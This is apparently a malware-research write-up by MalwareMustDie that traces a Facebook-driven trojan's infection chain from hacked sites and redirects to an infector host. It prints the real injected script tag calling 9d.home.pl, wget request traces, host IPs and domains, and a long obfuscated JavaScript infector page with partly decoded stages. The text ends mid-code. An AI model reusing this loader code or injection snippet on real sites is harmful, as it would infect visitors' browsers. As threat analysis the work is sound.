FaceBook IM & Web Driven Facebook Trojan with DGA Downloader

1. // #MalwareMUSTDie!
2. // FaceBook IM & Web Driven Facebook Trojan with DGA Downloader
3. // Infector: 67.228.248.34 (kemslispragmatic.com)...
4. // Payload Mothership: 103.246.115.238
5. // Block Mitigation String (PAYLOAD)= "best.lt.ua/dlimage4.php"
6. // Block Mitigation String (Infector) = "/hwaf.html?h="
7.  
8. // This Research was conducted by MalwareMustDie, NPO
9. // An openly shared material, can and welcome to be used
10. // for your threat awareness.
11. // But please Mention if you make referer of this to your -
12. // official Blog/Writing. With thank's in advance - @unixfreaxjp -
13.  
14. // Special thank's to URLQuery, Virus Total; with your dedicated great servicewe can detect "EVERYTHING" :-)
15.  
16. @unixfreaxjp /malware]$ date
17. Fri Nov  8 06:26:19 JST 2013
18.  
19. =========================
20. INFECTION ROUTE #1:
21. FACEBOOK LINKS
22. =========================
23.  
24.    6/39 2013-07-16 01:24:06
25.    [100]http://olivechurchministry.com/ocef.html?h=2282017
26.    5/39 2013-07-16 01:24:06
27.    [101]http://olivechurchministry.com/ovdt.html?h=2594522
28.    5/39 2013-07-16 01:24:05
29.    [102]http://olivechurchministry.com/zwmd.html?i=629980
30.    5/39 2013-07-16 01:24:06
31.    [103]http://olivechurchministry.com/zlnv.html?i=2382766
32.    5/39 2013-07-16 01:24:05
33.    [104]http://olivechurchministry.com/zwmd.html?h=744758
34.    7/39 2013-07-16 01:23:54
35.  
36. =========================
37. INFECTION ROUTE #2:
38. INFECTED SITES
39. =========================
40.  
41. // check
42.  
43. http://www.speedway.ne.jp/%7Esaburo/
44.  
45.  
46. // injected...
47.  
48. [...]
49. </table><!--339810--><script type="text/javascript">var gwloaded = false;</script>
50. <script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script><!--/339810-->
51. [...]
52.  
53.  
54. // links...
55.  
56.    4/50 2013-11-07 06:52:00 [35]http://9d.home.pl/pub/pOFBT2NP.php
57.    3/50 2013-11-06 11:59:11 [36]http://9d.home.pl/pub
58.    1/50 2013-11-06 02:06:16 [37]http://9d.home.pl/pub/pofbt2np.php
59.  
60.  
61. // fetch w/o java
62.  
63.  
64. --2013-11-08 04:48:52--  http://9d.home.pl/pub/pOFBT2NP.php
65. Resolving 9d.home.pl (9d.home.pl)... 79.96.233.122
66. Caching 9d.home.pl => 79.96.233.122
67. Connecting to 9d.home.pl (9d.home.pl)|79.96.233.122|:80... connected.
68.  
69. ---request begin---
70. GET /pub/pOFBT2NP.php HTTP/1.1
71. Referer: http://www.speedway.ne.jp/%7Esaburo/
72. HTTP request sent, awaiting response...
73.  
74. ---response begin---
75. HTTP/1.1 301 Moved
76. Connection: Keep-Alive
77. Content-Length: 202
78. Content-Type: text/html
79. Date: Thu, 07 Nov 2013 19:48:53 GMT
80. Location: http://kemslispragmatic.com/hwaf.html?h=582878
81. Server: IdeaWebServer/v0.80
82.  
83. ---response end---
84. 301 Moved
85. Registered socket 3 for persistent reuse.
86. Location: http://kemslispragmatic.com/hwaf.html?h=582878 [following]
87. Skipping 202 bytes of body: [<HTML>
88. <HEAD>
89.  
90.         <TITLE>301 Moved</TITLE>
91.  
92. </HEAD>
93. <BODY BGCOLOR=#FFFFFF>
94.  
95.         <H1>301 Moved</H1>
96.         The document has moved <A HREF="http://kemslispragmatic.com/hwaf.html?h=582878">here</A>.
97.  
98. </BODY>
99. </HTML>
100. ] done.
101. URI content encoding = None
102.  
103. --2013-11-08 04:48:53--  http://kemslispragmatic.com/hwaf.html?h=582878
104. conaddr is: 79.96.233.122
105. Resolving kemslispragmatic.com (kemslispragmatic.com)... 67.228.248.34
106. Caching kemslispragmatic.com => 67.228.248.34
107. Found kemslispragmatic.com in host_name_addresses_map (0x288041c0)
108. Connecting to kemslispragmatic.com (kemslispragmatic.com)|67.228.248.34|:80... connected.
109.  
110. ---request begin---
111. GET /hwaf.html?h=582878 HTTP/1.1
112. Referer: http://www.speedway.ne.jp/%7Esaburo/
113. HTTP request sent, awaiting response...
114.  
115. ---response begin---
116. HTTP/1.1 404 Not Found
117. Date: Thu, 07 Nov 2013 19:48:54 GMT
118. Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
119. Content-Length: 523
120. Keep-Alive: timeout=5, max=100
121. Connection: Keep-Alive
122. Content-Type: text/html; charset=iso-8859-1
123. [...]
124.  
125. // fetch w/ java
126.  
127. same result.
128.  
129. // check the landing page.
130.  
131. Name:   kemslispragmatic.com
132. Address: 67.228.248.34
133.  
134. ============================
135. INFECTOR HOST: 67.228.248.34
136. ============================
137.  
138. // domains...
139.  
140.    The server returned the following data:
141.    [6]kemslispragmatic.com   A   [7]67.228.248.34
142.    [8]kemslispragmatic.com   NS  [9]ns11.syskay.com
143.    [10]kemslispragmatic.com  NS  [11]ns12.syskay.com
144.  
145.  
146. // Possibly variation iof URL.. checked:
147.  
148. $ ipchk urlq hwaf.html
149. -----------------------------------------------------------
150. ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
151. -----------------------------------------------------------
152. Infection Record Source : urlq vt
153. -----------------------------------------------------------
154. 2013-11-07 04:15:56
155. 1 / 1 [7]http://kemslispragmatic.com/hwaf.html?h=582878
156.  
157. 2013-11-06 07:07:58
158. 1 / 0 [8]http://kemslispragmatic.com/hwaf.html?h=582878
159.  
160. 2013-11-06 07:06:25
161. 0 / 0 [9]http://kemslispragmatic.com/hwaf.html?h=58287
162.  
163. 2013-10-31 18:18:31
164. 1 / 1 [10]http://kemslispragmatic.com/hwaf.html?h=582878
165.  
166. 2013-10-31 15:44:52
167. 1 / 1 [11]http://kemslispragmatic.com/hwaf.html?h=582878
168.  
169. 2013-10-30 21:49:11
170. 1 / 1 [12]http://kemslispragmatic.com/hwaf.html?h=582878
171.  
172. 2/50 2013-11-06 06:07:10
173.    [56]http://kemslispragmatic.com/hwaf.html?h=582878
174.  
175. 1/39 2013-09-17 11:02:59
176.    [64]http://kemslispragmatic.com/hlft.html?i=3343031
177.  
178. 1/39 2013-07-21 18:58:02
179.    [89]http://kemslispragmatic.com/hwaf.html?i=3204044
180.  
181.  
182. ===========================
183. INFECTOR HTML
184. ===========================
185.  
186. // fetched sample's codes:
187.  
188. ＜!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"＞＜html＞＜head＞＜meta http-equiv='
189. x-ua-compatible' content='EmulateIE9'＞＜script＞l1l=document.all;var f9f76ca8b6=true;ll1=docum
190. ent.layers;lll=window.sidebar;f9f76ca8b6=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.us
191. erAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)＞0?true:false};lII=lI1('kht')
192. |lI1('per');f9f76ca8b6|=lII;n6V6vun=new Array();n6V6vun[0]='%68c%65\170\131%38\105\171%67%4D
193. nP%36\156%62'    ;p2oWy1B=new Array();p2oWy1B[0]=' ＜HTML＞＜head~script＞e
194. val(une~\rape(\'\\166ar%20q%79%37~/D~(~12~13B~+~-~/8~2%5
195. 3t~,2ing~(Ef~C~"57~L5C%68a~CCod~"45~(~=31~/3~(~Q~_~/0~(~.~8~R6~RF~
196. C~]i~＞3~g~8~q3~d2~/~y~0~/~iB~L~`2B~(}2~.7~9~,~i~5}3D~"6~`~;3~=7~3~8fu~L~l
197. 6~A}za~m}~(~*y~/~l2~=}~,~15~`~$~]~(}.4~L~1}}},~\\6}9E~B2E~Z1l~R~Q})}d~mc}
198. 5me}}=Ew}~D~,4~R~\\}\'}1~"7~`~|}E~3}~/}}\\}$3}&}(~~f}Jn~Z3}}3},1o}!~)~:
199. ~i~.}\'~h}*}[2}3~i~32~{Cs~(~y}|p}@~RE}"~,~b74yle~＞~6~R}p}-s|\n},}p41}eAn
200. o~~4~/|\r~w}~g7~y}:|\'|}~,}}|1|~/}D~n70r~Z~\\3|(|8}~b|6||pan|/|6~j7A~v~
201. {~36Eew}"~"0}~y|,~R| }0~6}@ft|=rB|67~E|&2}D}52}M146}4}R|o05n}G||k~4|~
202. $te|＜1|v|||j|l~R|-5}j},~N~#}}|p~\\4|n~R}59|I|z~~~,|N~a~＞|R|o|g}"A~\'|,a}[}
     }({\r5
203. 0|b}8~L}U|z|lh}V~\n{~4b|s|p||j~~~Z}|9|8k~r~t}6}\r~dDz}~|CE}B}:~F{,{*}b~L|C}}
204. }}+|,~v}U}|{84|}K}V|}O~G|.|%~[{.|o55|=}l~#}U7~b{}\nT{%|p~14Eam|=~]z~R~i~b
205. 5B{B5|
     {＜|p{＞}R~]j{C{S},|~＞|M{[~H}C{|Rg}o{2~8~L|{V}z}fo~\'}\'~v}{D~v{H{~u|5{W}*z
206. ~J}X1{Z~/}Uz~RA~?z  }*zzzzzz69}s|=z\r||W}Z{9j{x{`}V}NH~?}U4}1|pzza}~~yz}
207. zC|kz
     zE~}z"}`zf~,zg~8\'))＜/~\r~~~~~~n|=\'Old brows{za!\';dl=
208. docu}Lnt.lay{zas;oe=w~Eyw.o~ra?1:0yay\nyyey.~l&&!y;
209. gyyy\ryyy8t{Mey＜ById;yyyy
     .sideb~&?true:f~y;tN=navig
210. atz%.uyrAy8y/yfLy
     {zaCay();izy^y].yexOf~ ~t~~zk＞=0ySyUyWyYly[z?
211. s=y|y~xzax\'myMe 7xx\nxyVyXyZe;x8xNy}|xyx
     ~ xix8xxyTx"xxis|=x\'
212. yxxyy3!yyN){quogy \'iuy\'};~r xgzyy}ncti|$ ~myv{return
213.  x6exRy|xyK|${zayzaxU=xayAx&OFyIxqylyyex_n.pyzayfcolx+yOx("fi|")!=
214. -1x!xx$yx7fx=x:xBzx{wx#xx%ixdaxFy:y-y/|$dy#gst~&t=x[x]w xdxfxhxj x8xn;w
215. :x^x`cIExd(xWyww?xixkwCxRwFw＜ccxdw.y＜y x\\|$|xtyu=wIE;ytTi}LoutwwWyv"
216. ,~)0)xRwqwwwE~w;wHNS(exFw)(y||yvxe.which==2vvvvv=3xFwMsgwO
217. xgwQwBx$}v&x?vlw-y,w[c~w@eEvy.x(v2v4.MOUSEDOWxEyv,v8|$mwmyynwdw}e
218. w\'{wZvEnvGyieupvLSxRvRw0w]yyway.wc~w Fw|wGnwwPwAwCwv(yxFwUx`yzav
     v\nv
     v3y/
219. bwnyfvKvxF~{zawo\' zk;vmxk0xRu    xlx\rv\\vDv^vUvIy
     vKyzawTviw＜zw9xdxpyyLw6xhxuywhwj
220. wlwnxsu)\',{0wvuv"wAxmxRvy5v{uyvvCy;vSueov3ry_u+u＞w/yvFvHuBwnuF9ux\\vj
221. u0(w,xeu4wRv%w{uRw＜u1vwuYw@vkvw6ry＞.w6gN{}ewnuly'    ;cn7Nje='fu'    ;aF8PX7b
222. ='h1Pphs'    ;vjtc7xF71='OuRaGIuGOOBqOjOESFEO'    ;cn7Nje+='nction cHv346q'+'w049m0JYj(kRHf0
223. 4n8u65'+'nG5ePB1){'    ;qxZS473XYJ7R43='\166%61%72%20\154%32%3D\167i\156%64%6F\167%2Eo%70\14
224. 5r\141%3F%31%3A%30%3B%66u\156ct%69\157n%20l%36b%38%61%63%36%37%66%39f%28%29%7Bi%66%28f%39\14
225. 6%37%36%63a%38\142%36%29%7B%64o\143u\155%65n%74%2E\167r\151te%28%6C\117%29%7D%7D%3Bf%75n%63t
226. i\157n%20%6C%33%28%6C%34%29%7B\154%35%3D%2F%7A\141%2Fg%3B%6C%36%3D%53t\162\151%6E%67%2E\146%
227. 72o%6D\103%68\141\162%43\157d%65%28%30%29%3B\154%34%3D%6C%34%2E\162epl\141%63e%28l%35%2Cl%36
228. %29%3Bv%61\162%20l%37%3Dnew%20A\162r\141\171%28%29%2Cl%38%3D%5F%31%3Dl%34%2Elen%67%74h%2C%6C
229. %39%2C%6CI%2C%69\154%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C%6Ci%3D%27%27%3B\144%6F%7B
230. %6C%39%3D\154%34%2Echa\162C%6Fd%65\101t%28%5F%31%29%3BlI%3D%6C%34%2E\143\150\141%72C%6Fd%65A
231. t%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B'    ;function w049m0JYjcHv346q(iCdIME){vjtc7xF71+=iC
232. dIME};n6V6vun[0]+='y%61%36\156%55%75%34%37%34'    ;p2oWy1B[0]+='2&uf~&uiukum}LyL~  rv~ ^
233. (INPUT|TEXTAREA|BtTON|v=LECt~~)$zkwwwzvtxku2ubvvvvv1x
234. FuyKv.~xiv1vzv5v7y/v:v＜Ev:VEywt1yuKvVvGv3=uUv\'t%uT3t)vv\rt,vt/{tB.xf|ytt6v4sv
235. 6t7v9v;v=t＞t@yGyJtCvTuLtFyuqusv\' vyt0te.t3v0t9t8t^t;v=UP|tvt_t＜v?vAtAtrtDuwvKt\'t
236. dx~w\\uAvXtH3vNw\'tnxy8xBw+v+u?uuLvJtH1uQw}xknvkvxtUy＞SvOes xFxTxlx}us&s(s yvujoSy
237. T~Egu=vyxx.\'qw~ sdzxcx1vy|{Ph＞4wvvQuyb~Xyx+~rtLzy.ywzav.vjtVv
238. Oo~\nyvxRu&wkuMwo"s"wrwtu1wwxRsnywtKnixdtouXv]uJzws1xugw8tKw＞uZv$w\'shxgu\'skwswsowusr
239. ;r\rywszxByxBiwvsczy＜\'+\'div w5|y"poyMvj:absw\nwnx%||a:wu10pxy\
240. \y!r6u0r9r;ydth:6r@;~ycht:35r:x&-x:1"＞r\'rr~Epwnxly~="v|tv~"xa
241. unrcxqqrh~lyVrcrh|$Clvkwdcdyvr$tr&rcybyMbwir:vdyOnrWr[\'/r!vrXuHw[w~
242. |(fcsuuwHr{xdcrwpsU~&dDyeatstXrq\'w6sgu]s  wW~xFrlqq*rxu=siu(slq3so~swvrwisj
243. wmq=cq4wsq@qAv(x\'tqsyew6vtv~ |$wza~\nu.qy9wzznzpzuzszqttndzyuslI\'＞s,ppw   nw
244. y(s,qY7xY;qYx(s6~~F.fyzamCh~&~WyO(13u/0u/p{suz%(ix\nyx＜4|:yx++xFqs+=qw
245. xRqg1Irc＜"+"!--p$p"p(p$rW";Ip21rc/p.*p*y7p%p8p%p6p1qfp"zpp.q_p$qgp2p)+
246. pGI(2pJ"zypFp2pMvp%rZzoztp.zrp0lp p!"＜sp[|Hr~qzar x:pyy:|#~qi＜we＞p9p;pa/p
247. r~zopdnpt;p^Iy  ozaIpKIp pKp_p@zYp"p.||Hp~op^p"p6p%op}p0o
     opao\r|Gxkr%|zyqiqrwq
248. q  qqis@sBsDsFp$o1q0uSp^p xdoove {"y#y~ bez$xf|eg~Eu.\'a|a{zaoBoD,\'o＞o@v1|xoE
249. oG|rEoQywo
     p y_|To9ro;~ rLmloE~qWoLsUdxPoLaoEwkgoEqoEo@moEw6b|oEq^~omnr^toE
250. pupGp4ozauaywsytunxFv.y y&pTp!o8o:y(~-,nnp{snnnnn!{sywz~    k;nx2:no
251. [vfno＜},pn37u/5n31n7,9n＜wt2n;},n$xfan\'n) 3n,pTn.o]o_p n2n2},n＞nRn=n=|nA5nCn&
252. n(tY 4nJp2nLn0(n2n4n4nR|n;nUn?nXnZnEyo?aurrMn-no^np ny,nzn|n{n~qKpGy   nvo_pI,pTn:
253. ol,omp moYm   }Am ust/p1zY~s|.y＞y@y＜syC{wuluntoza[2])[0]wtmp2l[7m(wEpw8y
254. (t＜oYIyy.grDy\\pxFm=n[t]mqgy+sy=xgmt[m am"}Lm$p mFm3x]as\\om;sLm＞hm4r(
255. jpj＜mYL;jmA{o@(xpxp;xmlvm&Myehwy
     pN,xzl{o6~m\\[jm,xm.o
     [m＞l4
256. m(v&v\'opMoX}A~ywqflpoq:r  qDu)\'o3lu.r?t$qxklxds,o6p!mwkmR~mm/mKuIy~Eks,wmD
257. zYm]m=rDmy pTwm^lBqfo0v|pv*lp^y   m~~   |mOy~ onml＞mVp(wmHu8(qlqnf&pOxFyTylO}A
258. y0qly.dpzawr|lIw~&v4N~XvxfpjaqGlqz|mUmlIzl}sauu:lyGvlLusxFoYlQsStsnDlU|y＜lXolZo
259. lE[p(usl`x!lbqm|$let/lhrljklm~|xllsmluxfylxyOscl|l~kr|klCp^kkhublsuSoltTs
260. k,y_urlqvEkItkkLtUurw8kP;kCw＜ll,~& vay#vhx\\1Cyyx\nkXx`pkFs,k^ak`c|kkdm6kg'  
261.   ;cn7Nje+='eva'    ;yulH3LhUKQoX741='ErsxrjlLDylFsLTN'    ;cn7Nje+='l(unes'    ;cjX6ODk='pc
262. 565f485'    ;cn7Nje+='cape(kRHf04n8u65nG5ePB1))}'    ;eval(cn7Nje);i9uWnudk54='CWuJtOOvcgjYg
263. JOlwOyp'    ;cn7Nje=''    ;qxZS473XYJ7R43+='%2B%5D%3D\154\111%2Bi%6C%2D%28l%39%3C%3C%37%29%7
264. D%77%68%69%6C%65%28%5F%31%2B%2B%3C\154%38%29%3Bva%72%20l%31%3D%6E\145w%20Arra\171%28%29%2Cl%
265. 30%3D\156e\167%20\101\162\162a\171%28%29%2C%49l%3D%31%32%38%3B\144o%7B\154%30%5B\111\154%5D%
266. 3D%53tr%69n%67%2E\146ro%6D%43%68\141%72\103\157d\145%28I%6C%29%7D\167hi%6C\145%28%2D%2D%49l%
267. 29%3BI%6C%3D%31%32%38%3Bl%31%5B%30%5D%3Dl\151%3D%6C%30%5Bl%37%5B%30%5D%5D%3B\154l%3Dl%37%5B%
268. 30%5D%3B%5Fl%3D%31%3Bv\141r%20\154%5F%3Dl%37%2E%6Cen\147t\150%2D%31%3B%77%68i\154\145%28%5F\
269. 154%3Cl%5F%29%7Bswi\164%63h%28l%37%5B%5F\154%5D%3CIl%3F%31%3A%30%29%7Bca\163%65%20%30%20%3Al
270. %30%5BI%6C%5D%3D%6C%30%5Bl%6C%5D%2BS%74\162i\156%67%28l%30%5Bll%5D%29%2E\163u%62str%28%30%2C
271. %31%29%3B\154%31%5B%5F\154%5D%3D\154%30%5B\111l'    ;＜/script＞＜script＞eval(unescape('f%75nct
272. ion%20n%39%37%51%42\125%20%20%20%20%28\165\113%34%6A\150\120Ga%36M%32%6CdH%31%29%7Br%34%30%3
273. 2%35%6A\113%6A\126\123j\143%3D\165%4B%34\152h\120Ga%36M%32%6Cd\110%31%7D%3B'));rnNhBrLtGtlNy
274. ='l'    ;cjX6ODk+='p7uK6vc4zv2Adhe'    ;p2oWy1B[0]+='l*mv
     ,p,q{li{u8tUyMyOyQrxFv~Ey
275. jtAdzOqGys[tzY1[pm,qsnxecwlRkeR|Hy8s3lSyee~Wv`w`u~Fw3kqv(vYx\njk1lwly
276. x+j|eoO(u~f,vu7xj/tSjs~kTj7z%~j:j＜q|irw5k.wzvj/pO{v~k,lpk9j9jjOj?vvjSj2k3j4
277. jujExfjYj;v~w`So#rw~FsrkyeuxuuxFtJl) pLmcxFuEmzrDtV|Hyxcywqdo8q-q4ml mTrxmd=
278. tSo=qys8q|q~pzaply(jm|fwzapr*25+}:kvOjiiq|imbi!d*l\'ryopoyi6i8=oj
279. ＞mcj]xFi5i;i:i＜u3ud iDs;rauBf kRq\ntvLx:|sYw\'~yOw~dzkkGqOiOt7iQw5y.{za~ qVi[mp
280. ,wCwwi(xiI~oiLm~\ndiPiRicriUiWo?~Eei[sl7itivibsYieseigo3mikjinxripiLkRrfl}htvi
281. zx,iYi~i\\hqQht7qTnifu.h l(u^khp n{npvdyaycyeygvVykymyyoyqrysyui\r(kyNyP~&xFh+2i
282. =tUvq~u:h+sv(tUy!{zauXh+4i=isusy3nw=4hAp3ii=uwx-xsoG~&isHhZovi=(h+i)y3~h_
283. wxMx{hfhgp4{urn}q]ztzr~zaoz~tKl$xdk|o3p4mmkv4yCyEieusqhljj`y]j4xftik.hkjwwk?v
284. 
     o^j{v&h~qa~TITt＞Fl}yPookzng\'g)E~MEt NAg7rcGixh0rrhCtt   NTrcg,qGsU
285. g0tsomq\rg7g9g;g="Awnhz%gCgEEgGgIg-gLkgNgPg6g8Ag:g＜ErcKeywz%dpc gDgGg]gH"Wy
286. 
     ,jzw\ng{asAr0}Lg{w   w\ngQgfghgUD~hvjg[gug^gxy
     ! Hyaxywmk]uDr$ey.?q\rjnk tWrcs
287. gYkTy\rqbv|$rhhxfw"rLtp://fr/u!v-q)nE{}aihd.x/jLu~whp/yPfF/Ivn
288. -CVe5TGKy}w  rh/pzHtD~BODY＞g
     fr`rb\'w_t/zO~gqitKy#xqmi~FhklAhs+k\\v
289. ~&u#r.r{o?gvklm|#pqjLxhvwxyz\'yLpjq~ uu8lGf~h*f}=i+ig/mbi+fwiyv*e
     jLm＜sM
290. wzs,w5uE\'xZps,py(i＜epp{e1pe+s[e"i-im{i
     fxe)eAe-m_)]hziFe1ks ymDgOf@s#{e0i
291. zyf2f4f6re\'gOfzs96pJeo＞w5yyj(qrwml24fIp?eaiecs7f{pOrzy+ebfyeys9hYkMy/qq~rZ
292. w)y#}Lr$u~rcrsCgOrrhrBrDrc0f-erKw8"dwBdg.ryOuEdq\r/d\nunrXywxReUeW~Eyvg$q_~zaov|i
293. MyNd"u0%ddrcd:rhsUd"{zadrhqGusocs8dDq2vOl|Gq\ndJd% ~ycvK"joTq\rtohy~yTz~gw
294. wzad$#~85998d＜ed8dd^z}dTgdVr4trodrdVdX{zaq\rIMG SRCrce^f5f7f9wcf＜y0kf?f
295. AfCfEfGces/v2fLX/x/Qq6L1p
     QrYrw~FrhfeRDERdKALgwd&t~znyTd^xUbdaw\n
296. z%rc#E7EBF2dZdqrwdsrcdzgB rpdUcJv4d{~z$yv$qGrcrqdIw+eTe\'e,w6gYep,uDw+y`,hd~d
297. Ec＜dd0E}5FrhyMzr\'+4q\rB＞eVsifdS|xk]xs)r2xl~cVg.g0dSqlg{pjsBuo Yfyusz~xsx
298. iwx:i~ :zm/cyzncT~c6c5/c7＜d_c:dbc="c?cAcCcEdpdScHdycQcLcNcI"yfpq\rb!bcXucZac\\i
299. c^c`eWcc{zaceacg~ciq2ckc＞3bRbSrWbxi vJc}f&wmz|br~w7s8tnxk2fqngq.bhb w^fdRbl~ggH
300. tx|"frytf:ms`w|$.f.o?l6w[bzsbb~f;b＜w^b＞"cYyNbBgc]c_acabKcd|HbKchlcjdcc＞cmcocqfd
301. ＞IiLfbWbYhbXysnfnb_kTbtXnq!rx ~xfznbf7bkznApzc4a＜ra＜d\\a＜r.|fipbfkhyfnvafqy
302. abvqaqikir"byw
     af/e]rfe_/ycki~l{z%yw  otws1wusqd1gzaa6fffhzns[＞'    ;w049m0JYjcHv
303. 346q('j4VG01D212');qxZS473XYJ7R43+='%5D%3Bif%28l%32%29%7B%6Ci%2B%3D%6C%30%5BIl%5D%7D%3B%62re
304. %61k%3Bd%65f\141%75\154\164%3A\154%31%5B%5F\154%5D%3Dl%30%5B%6C%37%5B%5F%6C%5D%5D%3B%69%66%2
305. 8l%32%29%7B%6C\151%2B%3D\154%30%5B%6C%37%5B%5Fl%5D%5D%7D%3B\154%30%5BI\154%5D%3Dl%30%5B\154l
306. %5D%2BS%74%72\151ng%28l%30%5Bl%37%5B%5F\154%5D%5D%29%2Es%75%62\163t\162%28%30%2C%31%29%3B%62
307. %72e\141\153%7D%3B%49%6C%2B%2B%3Bll%3D%6C%37%5B%5Fl%5D%3B%5F%6C%2B%2B%7D%3Bi%66%28%21\154%32
308. %29%7Br\145%74urn%28\154%31%2E\152oin%28%27%27%29%29%7D\145\154se%7B%72et%75%72\156%20%6Ci%7
309. D%7D%3B%76a%72%20lO%3D%27%27%3B\146%6Fr%28\151%69%3D%30%3B%69%69%3C%70%32o%57y%31%42%2E\154e
310. \156\147t\150%3Bi%69%2B%2B%29%7BlO%2B%3D\154%33%28p%32%6F%57\171%31\102%5B\151i%5D%29%7D%3B\
311. 154%36\142%38\141\143%36%37f%39%66%28%29%3B'    ;i9uWnudk54      ='OOhrEONOvMjmgCTBHfvBtHNTj
312. OsX'    ;qF7u2oYdq1wbJ='kI03H2w13x'    ;w049m0JYjcHv346q    (yulH3LhUKQoX741);cHv346qw049m0J
313. Yj (qxZS473XYJ7R43);n97QBU  (qxZS473XYJ7R43);o38iRr2IxdH5Wn8='vjDJ5wc2fj0fy3H3es7e7DDy'    ;
314. eval(unescape('%71%79%36%28%29%3B'));rnNhBrLtGtlNy+='rhmQEknosQONOwmOjwVRgvMfPaYBOGQRPPfnLOO
315. OuDdOOGyEQMpHOhUCnuXp'    ;cjX6ODk+='s9CJ8bJ8'    ;＜/script＞＜/head＞＜body＞＜/body＞＜/html＞
316.  
317. // Decoded first step:
318.  
319.  var l2 = window.opera ? 1 : 0;
320.  function l6b8ac67f9f()
321.  {
322.    if (f9f76ca8b6)
323.    {
324.      document.write(lO)
325.    }
326.  };
327.  function l3(l4)
328.  {
329.    l5 =/ za / g;
330.    l6 = String.fromCharCode(0);
331.    l4 = l4.replace(l5, l6);
332.    var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
333.    do
334.    {
335.      l9 = l4.charCodeAt(_1);
336.      lI = l4.charCodeAt( ++ _1);
337.      l7[I ++ ] = lI + il - (l9 << 7)
338.    }
339.    while (_1 ++< l8);
340.    var l1 = new Array(), l0 = new Array(), Il = 128;
341.    do
342.    {
343.      l0[Il] = String.fromCharCode(Il)
344.    }
345.    while ( -- Il);
346.    Il = 128;
347.    l1[0] = li = l0[l7[0]];
348.    ll = l7[0];
349.    _l = 1;
350.    var l_ = l7.length - 1;
351.    while (_l < l_)
352.    {
353.      switch(l7[_l] < Il ? 1 : 0)
354.      {
355.        case0 : l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
356.        l1[_l] = l0[Il];
357.        if (l2)
358.        {
359.          li += l0[Il]
360.        };
361.        break ;
362.        default : l1[_l] = l0[l7[_l]];
363.        if (l2)
364.        {
365.          li += l0[l7[_l]]
366.        };
367.        l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
368.        break
369.      };
370.      Il++;
371.      ll = l7[_l];
372.      _l ++
373.    };
374.    if (!l2)
375.    {
376.      return (l1.join(''))
377.    }
378.    else
379.    {
380.      return li
381.    }
382.  };
383.  var lO = '';
384.  for (ii = 0; ii < p2oWy1B.length; ii ++ )
385.  {
386.    lO += l3(p2oWy1B[ii])
387.  };
388.  l6b8ac67f9f();
389.  
390.  
391. // Decoded Second Step (extracted values / written):
392.  
393.  
394.  <HTML><head><script>eval(unescape('
395.  \166ar%20q%79%37%3D%27%27%3Bq%79%38%3D%53t%72ing%2Ef%72\157\155C%68a%72Cod\145%28%31%33%2C
396.  %31%30%29%3B%66%6F%72%28i%3D%30%3Bi%3C%32%32%37%39%3B\151%2B%2B%29%7Bq%79%37%2B%3D\161%79%
397.  38%7D%3Bfu\156%63t\151%6F\156%20qy%36%28%29%7B\151%66%28%21%64\157%63u\155%65%6Et%2E\141l%
398.  6C%29%7Bd%6Fc\165me\156t%2Ew\162i%74%65%28\161\171%37%29%7D%7D%3B%71y%36%28%29%3Bf\165n\14
399.  3\164\151o\156%20q%79%39%28%29%7B\172\151%39%3D%22%3Cs%22%2B%22p\141%6E%20%73%74yle%3D%27%
400.  64\151sp\154\141y%3Anone%27%3E%3C\160%72%65%3E%22%2B%71%79%37%2B%22%3C%2F%70r\145%3E%3C%2F
401.  \163%22%2B%22pan%3E%22%3B%7Ai%32%3D%6Eew%20\101%72%72%61y%28%27\141ft\145rBe%67in%27%2C%27
402.  %62e\146\157\162e\105nd%27%2C%27\141%66ter\105%6E%64%27%2C%27%62%65f\157\162\145%42e%67%69
403.  n%27%29%3B%7Ai%33%3D%6Ee\167%20Ar%72a\171%28%27\150t\155\154%27%2C%27h%65ad%27%2C%27b\157\
404.  144y%27%29%3B\146%6F%72%28k%3D%30%3B%6B%3C%3Dz\151%33%2El%65ngt\150%3B\153%2B%2B%29%7B\172
405.  i%34%3D%64\157\143%75m%65%6Et%2Eg%65%74%45\154e\155\145n\164%73%42%79Ta\147%4Eam\145%28z%6
406.  9%33%5Bk%5D%29%3B\146%6F\162%28j%3D%30%3B\152%3C%3D%7Ai%34%2E%6C\145%6Eg\164h%3B\152%2B%2B
407.  %29%7Bfor%28i%3D%30%3Bi%3C%3D%33%3Bi%2B%2B%29%7B%69f%28\172i%34%5B%6A%5D%29%7Bzi%34%5Bj%5D
408.  %2E%69\156s\145\162%74\101\144ja\143%65\156tH%54%4D\114%28z\151%32%5B\151%5D%2Cz%69%39%29%
409.  7D%7D%7D%7D%7D%3B'))</script><script>nsp = 'Old browser!';
410.  dl = document.layers;
411.  oe = window.opera ? 1 : 0;
412.  da = document.all &&! oe;
413.  ge = document.getElementById;
414.  ws = window.sidebar ? true : false;
415.  tN = navigator.userAgent.toLowerCase();
416.  izN = tN.indexOf('netscape') >= 0 ? true : false;
417.  zis = tN.indexOf('msie 7') >= 0 ? true : false;
418.  zis8 = tN.indexOf('msie 8') >= 0 ? true : false;
419.  zis |= zis8;
420.  if (ws &&! izN)
421.  {
422.    quogl = 'iuy'
423.  };
424.  var msg = '';
425.  function nem()
426.  {
427.    return true
428.  };
429.  window.onerror = nem;
430.  zOF = window.location.protocol.indexOf("file") !=- 1 ? true : false;
431.  i7f = zis &&! zOF ? true : false;
432.  if (da)
433.  {
434.    document.ondragstart = function ()
435.    {
436.      return false
437.    };
438.    function cIE()
439.    {
440.      (msg);
441.      return false
442.    };
443.    function cc()
444.    {
445.      document.oncontextmenu = cIE;
446.      setTimeout("cc()", 200)
447.    };
448.    cc()
449.  };
450.  function cNS(e)
451.  {
452.    if (dl || ws)
453.    {
454.      if (e.which == 2 || e.which == 3)
455.      {
456.        (msg);
457.        return false
458.      }
459.    }
460.  };
461.  if (dl)
462.  {
